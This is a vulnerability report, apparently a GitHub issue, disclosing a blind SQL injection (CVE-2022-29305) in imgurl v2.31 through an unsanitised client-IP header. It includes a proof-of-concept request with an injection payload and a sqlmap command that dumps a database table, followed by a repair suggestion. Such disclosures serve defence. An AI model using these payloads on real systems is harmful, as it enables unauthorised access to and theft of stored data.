CVE-2022-29305: Blind SQL Injection Vulnerability · Issue #75 · helloxz/imgurl

Description （漏洞描述）

imgurl v2.31

Multiple ways are used to obtain user ip （使用了多种方法获取用户ip）

Then splice the user ip directly into the sql statement in lines 44 to 58 of upload.php（在upload.php的44到58行中，直接将ip拼接到了sql语句中）

query->uplimit($ip)

Proof of Concept

GET /upload/localhost HTTP/1.1 Host: host.local Cookie: XSRF-TOKEN=[Your_XSRF-TOKEN]; x-forwarded-for: ' union select case(2>1)when(1)then(10)else(0)end order by num desc– Connection: close

Command for injection using sqlmap

python3 sqlmap.py -r http.txt --prefix="’ union select case((1=1) and " --suffix=")when(1)then(10)else(0)end order by num desc-- " -level 3 -risk 3 --dbms sqlite -technique=B --text-only -T img_options -D values --dump

Repair method （修复方法）

Check user ip format or use PDO to prevent sql injection （检查用户ip格式或使用PDO来防止sql注入）